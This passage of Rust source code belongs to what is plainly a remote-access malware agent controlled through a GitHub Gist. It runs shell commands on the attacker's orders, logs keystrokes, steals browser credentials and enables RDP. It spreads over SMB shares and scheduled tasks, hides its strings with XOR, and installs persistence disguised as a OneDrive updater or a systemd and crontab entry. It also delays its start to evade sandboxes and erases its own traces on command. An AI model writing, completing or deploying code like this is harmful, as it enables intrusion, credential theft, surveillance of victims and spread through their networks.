                output.push_str(&format!("[-] Task run failed: {}\n", stdout.trim()));
            }
        }
        Err(e) => output.push_str(&format!("[-] Scheduler run error: {}\n", e)),
    }
    // Step 5: Clean up scheduled task artifact
    let mut del_args: Vec<String> = vec![
        sc_delete.clone(), sc_s.clone(), host.to_string(),
        sc_tn.clone(), task_name.clone(), sc_f.clone(),
    ];
    if !user.is_empty() { del_args.extend([sc_u.clone(), user.to_string()]); }
    if !pass.is_empty() { del_args.extend([sc_p.clone(), pass.to_string()]); }
    let _ = Command::new(&sc_cmd).args(&del_args).output();
    output
}
fn propagate_via_smb(parts: &[&str]) -> String {
    if parts.is_empty() {
        let shares = discover_smb_shares();
        if shares.is_empty() {
            return "[-] No mounted SMB shares found.".to_string();
        }
        let mut results = format!("=== PROPAGATION RESULTS ({} share(s)) ===\n", shares.len());
        for share in &shares {
            results.push_str(&propagate_to_target(share, "", ""));
            results.push('\n');
        }
        results.push_str("=== END ===");
        return results;
    }
    // Manual mode: propagate \\host\share [user] [pass]
    let target = parts[0];
    let user = parts.get(1).copied().unwrap_or("");
    let pass = parts.get(2).copied().unwrap_or("");
    format!("=== PROPAGATION RESULTS ===\n{}=== END ===", propagate_to_target(target, user, pass))
}
// Command handler - routes commands to appropriate modules
fn handle_command(command: &str) -> String {
    let parts: Vec<&str> = command.trim().split_whitespace().collect();
    if parts.is_empty() {
        return "Empty command".to_string();
    }

    match parts[0] {
        "ping" => "pong".to_string(),
        "info" => {
            format!(
                "Agent Info:\nHostname: {}\nOS: {}\nArch: {}",
                hostname::get().unwrap().to_string_lossy(),
                std::env::consts::OS,
                std::env::consts::ARCH
            )
        }
        "exec" => {
            if parts.len() < 2 {
                return "Usage: exec <command>".to_string();
            }
            let cmd = parts[1..].join(" ");
            execute_shell_command(&cmd)
        }
        "keylogger" => {
            if parts.len() < 2 {
                return "Usage: keylogger <start|stop|dump>".to_string();
            }
            match parts[1] {
                "start" => start_keylogger(),
                "stop" => stop_keylogger(),
                "dump" => get_keylog(),
                _ => "Invalid keylogger action. Use: start, stop, or dump".to_string(),
            }
        }
        "rdp" | "enable-rdp" => enable_rdp(),
        "disable-rdp" => disable_rdp(),
        "steal-creds" | "browser-creds" => steal_browser_credentials(),
        "terminate" => {
            println!("[!] TERMINATION SIGNAL RECEIVED");
            KEYLOGGER_RUNNING.store(false, Ordering::Relaxed);
            thread::sleep(Duration::from_millis(500));
            
            // Perform full trace removal before self-deletion
            remove_traces();
            
            match std::env::current_exe() {
                Ok(exe_path) => {
                    println!("[*] Deleting current running binary: {:?}", exe_path);
                    let _ = std::fs::remove_file(exe_path);
                }
                Err(e) => println!("[-] Failed to locate self for deletion: {}", e),
            }
            println!("[*] Exiting...");
            std::process::exit(0);
        }
        "propagate" => propagate_via_smb(&parts[1..]),
        _ => format!("Unknown command: {}", parts[0]),
    }
}

// Execute shell command
fn execute_shell_command(command: &str) -> String {
    #[cfg(target_os = "windows")]
    let output = std::process::Command::new("cmd")
        .args(&["/C", command])
        .output();

    #[cfg(not(target_os = "windows"))]
    let output = std::process::Command::new("sh")
        .args(&["-c", command])
        .output();

    match output {
        Ok(out) => {
            let stdout = String::from_utf8_lossy(&out.stdout);
            let stderr = String::from_utf8_lossy(&out.stderr);
            if stderr.is_empty() {
                stdout.to_string()
            } else {
                format!("{}{}", stdout, stderr)
            }
        }
        Err(e) => format!("Failed to execute: {}", e),
    }
}

// ---------------------------------------------------------------------------
// Stable agent ID — derived from hardware fingerprint, persisted to disk
// ---------------------------------------------------------------------------

/// Returns a stable agent ID that survives reboots and re-runs.
/// Strategy:
///   Windows: read MachineGuid from registry, hash it → deterministic UUID.
///   Linux/other: read /etc/machine-id, hash it.
///   Fallback: generate a random UUID and save it to a hidden file next to
///             the binary so at least the same install is consistent.
fn get_stable_agent_id() -> String {
    use std::collections::hash_map::DefaultHasher;
    use std::hash::{Hash, Hasher};

    // Helper: turn an arbitrary string into a stable UUID-shaped string
    fn to_uuid(seed: &str) -> String {
        let mut h1 = DefaultHasher::new();
        seed.hash(&mut h1);
        let a = h1.finish();
        let mut h2 = DefaultHasher::new();
        format!("{}_{}", seed, a).hash(&mut h2);
        let b = h2.finish();
        format!("{:08x}-{:04x}-{:04x}-{:04x}-{:012x}",
            (a >> 32) as u32,
            (a >> 16) as u16,
            a as u16,
            (b >> 48) as u16,
            b & 0x0000_ffff_ffff_ffff,
        )
    }

    // 1. Try Windows MachineGuid from registry
    #[cfg(windows)]
    {
        use std::process::Command;
        let reg_key  = String::from_utf8(xor_decrypt(secrets::ENC_MACHINE_GUID_KEY)).unwrap_or_default();
        let reg_val  = String::from_utf8(xor_decrypt(secrets::ENC_MACHINE_GUID_VAL)).unwrap_or_default();
        let reg_cmd  = String::from_utf8(xor_decrypt(secrets::ENC_REG_CMD)).unwrap_or_default();
        if let Ok(out) = Command::new(&reg_cmd)
            .args(&[
                "query",
                &reg_key,
                "/v", &reg_val,
            ])
            .output()
        {
            let text = String::from_utf8_lossy(&out.stdout);
            for line in text.lines() {
                if line.trim_start().starts_with("MachineGuid") {
                    // Line format: "    MachineGuid    REG_SZ    <value>"
                    if let Some(guid) = line.split_whitespace().last() {
                        let guid = guid.trim();
                        if !guid.is_empty() {
                            println!("[+] Agent ID source: Windows MachineGuid");
                            return to_uuid(guid);
                        }
                    }
                }
            }
        }
    }

    // 2. Try /etc/machine-id (Linux/macOS)
    #[cfg(not(windows))]
    if let Ok(mid) = std::fs::read_to_string("/etc/machine-id") {
        let mid = mid.trim().to_string();
        if !mid.is_empty() {
            println!("[+] Agent ID source: /etc/machine-id");
            return to_uuid(&mid);
        }
    }

    // 3. Fallback: persist a random ID to a hidden file next to the binary
    let id_path = std::env::current_exe()
        .ok()
        .and_then(|p| p.parent().map(|d| d.join(".agent_id")))
        .unwrap_or_else(|| std::path::PathBuf::from(".agent_id"));

    if let Ok(saved) = std::fs::read_to_string(&id_path) {
        let saved = saved.trim().to_string();
        if !saved.is_empty() {
            println!("[+] Agent ID source: persisted file");
            return saved;
        }
    }

    let new_id = Uuid::new_v4().to_string();
    let _ = std::fs::write(&id_path, &new_id);
    println!("[+] Agent ID source: newly generated (saved to disk)");
    new_id
}

// ---------------------------------------------------------------------------
// Cleanup — remove all traces
// ---------------------------------------------------------------------------

/// Removes all traces of the agent from the infected computer.
fn remove_traces() {
    println!("[!] EXECUTING FULL CLEANUP...");

    // 1. Remove .agent_id file
    if let Ok(exe_path) = std::env::current_exe() {
        if let Some(parent) = exe_path.parent() {
            let id_path = parent.join(".agent_id");
            if id_path.exists() {
                println!("[*] Deleting agent ID file: {:?}", id_path);
                let _ = fs::remove_file(id_path);
            }
        }
    }

    // 2. Platform-specific persistence removal
    #[cfg(windows)]
    {
        let dest_env    = String::from_utf8(xor_decrypt(secrets::ENC_DEST_ENV_VAR)).unwrap_or_default();
        let dir_suffix  = String::from_utf8(xor_decrypt(secrets::ENC_DEST_DIR_SUFFIX)).unwrap_or_default();
        let exe_name    = String::from_utf8(xor_decrypt(secrets::ENC_EXE_NAME)).unwrap_or_default();
        let lnk_name    = String::from_utf8(xor_decrypt(secrets::ENC_LNK_NAME)).unwrap_or_default();
        let startup_env = String::from_utf8(xor_decrypt(secrets::ENC_STARTUP_ENV)).unwrap_or_default();
        let startup_sub = String::from_utf8(xor_decrypt(secrets::ENC_STARTUP_SUBDIR)).unwrap_or_default();

        // Remove Startup .lnk
        if let Ok(appdata) = std::env::var(&startup_env) {
            let lnk_path = format!("{}\\{}\\{}", appdata, startup_sub, lnk_name);
            let p = std::path::Path::new(&lnk_path);
            if p.exists() {
                println!("[*] Deleting startup shortcut: {:?}", p);
                let _ = fs::remove_file(p);
            }
        }

        // Remove Persistence Binary (if not currently running from it)
        if let Ok(localappdata) = std::env::var(&dest_env) {
            let dest_path = format!("{}\\{}\\{}", localappdata, dir_suffix, exe_name);
            let p = std::path::Path::new(&dest_path);
            if p.exists() {
                if let Ok(current_exe) = std::env::current_exe() {
                    if current_exe.to_string_lossy().to_lowercase() != dest_path.to_lowercase() {
                        println!("[*] Deleting persistence binary: {:?}", p);
                        let _ = fs::remove_file(p);
                    }
                }
            }
        }

        // Remove chromelevator.exe and output dir in TEMP
        if let Ok(tmp) = std::env::var("TEMP").or_else(|_| std::env::var("TMP")) {
            let exe_path = format!("{}\\chromelevator.exe", tmp);
            let out_dir  = format!("{}\\clev_out", tmp);
            
            let p_exe = std::path::Path::new(&exe_path);
            if p_exe.exists() {
                println!("[*] Deleting payload: {:?}", p_exe);
                let _ = fs::remove_file(p_exe);
            }
            
            let p_dir = std::path::Path::new(&out_dir);
            if p_dir.exists() {
                println!("[*] Deleting payload output: {:?}", p_dir);
                let _ = fs::remove_dir_all(p_dir);
            }
        }
    }

    #[cfg(not(windows))]
    {
        // Remove systemd user service
        if let Ok(home) = std::env::var("HOME") {
            let service_path = format!("{}/.config/systemd/user/agent-update.service", home);
            let p = std::path::Path::new(&service_path);
            if p.exists() {
                println!("[*] Disabling and removing systemd service...");
                let _ = std::process::Command::new("systemctl")
                    .args(&["--user", "stop", "agent-update.service"])
                    .status();
                let _ = std::process::Command::new("systemctl")
                    .args(&["--user", "disable", "agent-update.service"])
                    .status();
                let _ = fs::remove_file(p);
                // Reload daemon
                let _ = std::process::Command::new("systemctl")
                    .args(&["--user", "daemon-reload"])
                    .status();
            }
        }

        // Remove crontab entry
        let existing = std::process::Command::new("crontab")
            .arg("-l")
            .output()
            .ok()
            .and_then(|o| String::from_utf8(o.stdout).ok())
            .unwrap_or_default();

        if existing.contains("OneDriveUpdater") || existing.contains("c2_agent") {
            println!("[*] Cleaning crontab...");
            let mut lines: Vec<String> = Vec::new();
            for line in existing.lines() {
                if !line.contains("OneDriveUpdater") && !line.contains("c2_agent") {
                    lines.push(line.to_string());
                }
            }
            let new_crontab = lines.join("\n") + "\n";
            use std::io::Write;
            let mut child = std::process::Command::new("crontab")
                .arg("-")
                .stdin(std::process::Stdio::piped())
                .spawn()
                .ok();
            if let Some(mut c) = child {
                if let Some(stdin) = c.stdin.as_mut() {
                    let _ = stdin.write_all(new_crontab.as_bytes());
                }
                let _ = c.wait();
            }
        }
    }
}

// ---------------------------------------------------------------------------
// Persistence — survive reboots
// ---------------------------------------------------------------------------

/// Installs the agent so it runs automatically on next login/boot.
/// Installs the agent persistence (no admin required).
/// Windows: copies binary to %LOCALAPPDATA%\Microsoft\OneDrive\OneDriveUpdater.exe
///          then drops a .lnk in the user Startup folder so it runs at every logon.
/// Linux:   systemd user service, fallback to crontab @reboot.
/// Silent — logs but never panics.
fn install_persistence() {
    #[cfg(windows)]
    {
        // Decode obfuscated IOC strings at runtime
        let dest_env    = String::from_utf8(xor_decrypt(secrets::ENC_DEST_ENV_VAR)).unwrap_or_default();
        let dir_suffix  = String::from_utf8(xor_decrypt(secrets::ENC_DEST_DIR_SUFFIX)).unwrap_or_default();
        let exe_name    = String::from_utf8(xor_decrypt(secrets::ENC_EXE_NAME)).unwrap_or_default();
        let lnk_name    = String::from_utf8(xor_decrypt(secrets::ENC_LNK_NAME)).unwrap_or_default();
        let startup_env = String::from_utf8(xor_decrypt(secrets::ENC_STARTUP_ENV)).unwrap_or_default();
        let startup_sub = String::from_utf8(xor_decrypt(secrets::ENC_STARTUP_SUBDIR)).unwrap_or_default();
        let localappdata = match std::env::var(&dest_env) {
            Ok(v) => v,
            Err(_) => { return; }
        };
        let appdata = match std::env::var(&startup_env) {
            Ok(v) => v,
            Err(_) => { return; }
        };

        // ── 1. Copy binary to disguised OneDrive location ─────────────────────
        let dest_dir  = format!("{}\\{}", localappdata, dir_suffix);
        let dest_path = format!("{}\\{}", dest_dir, exe_name);
        let _ = std::fs::create_dir_all(&dest_dir);
        let exe = match std::env::current_exe() {
            Ok(p) => p,
            Err(_) => { return; }
        };
        if exe.to_string_lossy() != dest_path {
            if std::fs::copy(&exe, &dest_path).is_err() { return; }
        }

        // ── 2. Startup folder .lnk ────────────────────────────────────────────
        // %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\<name>.lnk
        // Loaded by explorer at every logon — 100% reliable, user-context, no admin.
        let startup_dir = format!("{}\\{}", appdata, startup_sub);
        let lnk_path    = format!("{}\\{}", startup_dir, lnk_name);

        if !std::path::Path::new(&lnk_path).exists() {
            // Create .lnk via PowerShell WScript.Shell — no extra deps needed
            let ps_script = format!(
                "$s=(New-Object -COM WScript.Shell).CreateShortcut('{lnk}');$s.TargetPath='{target}';$s.WorkingDirectory='{workdir}';$s.Description='Microsoft OneDrive Update Service';$s.Save()",
                lnk     = lnk_path.replace("'", "''"),
                target  = dest_path.replace("'", "''"),
                workdir = dest_dir.replace("'", "''"),
            );
            let status = std::process::Command::new("powershell")
                .args(&["-NonInteractive", "-WindowStyle", "Hidden", "-Command", &ps_script])
                .status();
            match status {
                Ok(s) if s.success() => println!("[+] Persistence: startup shortcut installed"),
                _ => println!("[-] Persistence: shortcut creation failed"),
            }
        } else {
            println!("[+] Persistence: startup shortcut already present");
        }
    }

    #[cfg(not(windows))]
    {
        let exe = match std::env::current_exe() {
            Ok(p) => p,
            Err(e) => { println!("[-] Persistence: cannot get exe path: {}", e); return; }
        };
        let exe_str = exe.to_string_lossy().to_string();

        // Try systemd user service
        let installed_systemd = (|| -> Option<()> {
            let home = std::env::var("HOME").ok()?;
            let dir = format!("{}/.config/systemd/user", home);
            std::fs::create_dir_all(&dir).ok()?;
            let unit = format!("[Unit]\nDescription=System Update Service\n\n[Service]\nExecStart={}\nRestart=on-failure\nRestartSec=30\n\n[Install]\nWantedBy=default.target\n", exe_str);
            std::fs::write(format!("{}/agent-update.service", dir), unit).ok()?;
            let ok = std::process::Command::new("systemctl")
                .args(&["--user", "enable", "--now", "agent-update.service"])
                .status().map(|s| s.success()).unwrap_or(false);
            if ok { Some(()) } else { None }
        })().is_some();

        if installed_systemd {
            println!("[+] Persistence: systemd user service installed");
            return;
        }

        // Fallback: crontab @reboot
        let cron_entry = format!("@reboot {}", exe_str);
        let existing = std::process::Command::new("crontab")
            .arg("-l")
            .output()
            .ok()
            .and_then(|o| String::from_utf8(o.stdout).ok())
            .unwrap_or_default();

        if existing.contains(&cron_entry) {
            println!("[+] Persistence: crontab @reboot already present");
            return;
        }

        let new_crontab = format!("{}", existing.trim_end().to_string() + "\n" + &cron_entry + "\n");
        use std::io::Write;
        let mut child = match std::process::Command::new("crontab")
            .arg("-")
            .stdin(std::process::Stdio::piped())
            .spawn()
        {
            Ok(c) => c,
            Err(e) => { println!("[-] Persistence: crontab spawn failed: {}", e); return; }
        };
        if let Some(stdin) = child.stdin.as_mut() {
            let _ = stdin.write_all(new_crontab.as_bytes());
        }
        let _ = child.wait();
        println!("[+] Persistence: crontab @reboot entry installed");
    }
}

fn main() {
    // Startup jitter — delays execution to evade behavioral sandboxes
    #[cfg(windows)]
    {
        use rand::Rng;
        let jitter = rand::thread_rng().gen_range(5u64..30u64);
        std::thread::sleep(std::time::Duration::from_secs(jitter));
    }
    install_persistence();
    // Load configuration from .env and files
    let config = match Config::load() {
        Ok(cfg) => cfg,
        Err(e) => {
            eprintln!("[-] Configuration error: {}", e);
            eprintln!("[!] Make sure .env file exists with GITHUB_TOKEN and GIST_ID");
            eprintln!("[!] Make sure public_key.pem and aes_key.txt files exist");

            #[cfg(not(feature = "stealth"))]
            {
                println!("\nPress Return to exit...");
                let _ = std::io::stdin().read_line(&mut String::new());
            }

            std::process::exit(1);
        }
    };

    println!("[+] Configuration loaded successfully");
    println!("[+] Gist ID: {}", config.gist_id);

    // Stable agent ID derived from machine hardware (survives reboots)
    let agent_id = get_stable_agent_id();
    println!("[+] Agent started with ID: {}", agent_id);

    // Track last executed task ID to avoid re-execution
    let mut last_task_id: Option<String> = None;
    // Throttle telemetry: only send heartbeat every N loops to avoid Gist rate limits
    let mut loop_counter: u32 = 0;
    const TELEMETRY_EVERY_N_LOOPS: u32 = 10;

    // Initialize system info
    let mut sys = System::new_all();

    // Send initial telemetry checkin
    let stats = collect_system_stats(&mut sys);
    let telemetry_json = serde_json::to_string(&stats).unwrap_or_else(|_| "{}".to_string());

    if let Err(e) = send_result(&config, &agent_id, &telemetry_json) {
        eprintln!("[-] Failed to send initial checkin: {}", e);
    }

    // Main polling loop
    loop {
        loop_counter += 1;

        // Send heartbeat telemetry only every N loops (not every poll) to reduce Gist API traffic
        if loop_counter % TELEMETRY_EVERY_N_LOOPS == 1 {
            let stats = collect_system_stats(&mut sys);
            let telemetry_json = serde_json::to_string(&stats).unwrap_or_else(|_| "{}".to_string());
            if let Err(e) = send_result(&config, &agent_id, &telemetry_json) {
                eprintln!("[-] Failed to send heartbeat telemetry: {}", e);
            }
        }

        match get_task(&config, &agent_id) {
            Ok(Some((command, task_id))) => {
                // Check if this is a new task
                if last_task_id.as_ref() != Some(&task_id) {
                    println!("[*] Received NEW command (ID: {}): {}", task_id, command);
                    let result = handle_command(&command);
                    println!("[*] Command result: {}", result);
                    // Mark task as executed immediately — before send, so a failed upload
                    // never causes the same task to re-run on the next poll.
                    last_task_id = Some(task_id);

                    if let Err(e) = send_result(&config, &agent_id, &result) {
                        eprintln!("[-] Failed to send result: {}", e);
                    }
                } else {
                    println!("[*] Task already executed (ID: {}), skipping", task_id);
                }
            }
            Ok(None) => {
                println!("[*] No task found");
            }
            Err(e) => {
                eprintln!("[-] Error getting task: {}", e);
            }
        }

        // Sleep with jitter (30-90 seconds)
        let sleep_time = rand::thread_rng().gen_range(30..90);
        println!("[*] Sleeping for {} seconds...", sleep_time);
        std::thread::sleep(Duration::from_secs(sleep_time));
    }
}
